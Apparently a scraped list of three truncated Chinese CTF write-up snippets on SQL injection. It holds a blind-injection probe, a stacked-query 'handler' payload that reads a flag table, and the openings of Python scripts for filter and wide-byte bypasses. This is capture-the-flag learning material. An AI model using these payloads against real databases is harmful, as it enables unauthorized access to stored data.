2020年02月22日
测试出注入点2-(ascii(substr(database(),1,1))>1)由于过滤了or和union select,无法通过常规手段获取表名和字段名,使用mysql5.7新特性获得表名,使用select语句比较时按各字段进行比较的特点,来构造盲注语句,代码如下:#encoding=utf-8
import requests
def str_to_hex(s):
return '
2020年02月22日
熟悉的界面,点击输入框,出现以前的题输入过的payload,试一试就得到了flag,应该是原题1';show tables;#1';handler FlagHere open;handler FlagHere read first;#
2020年02月22日
宽字节注入+存储过程绕过+语句转十六进制脚本如下import requests
flag = ""
cookie = {
'ci_session': '934c5dbfca4a789a17b73c1f36c6ec78b81b02b3',
'UM_distinctid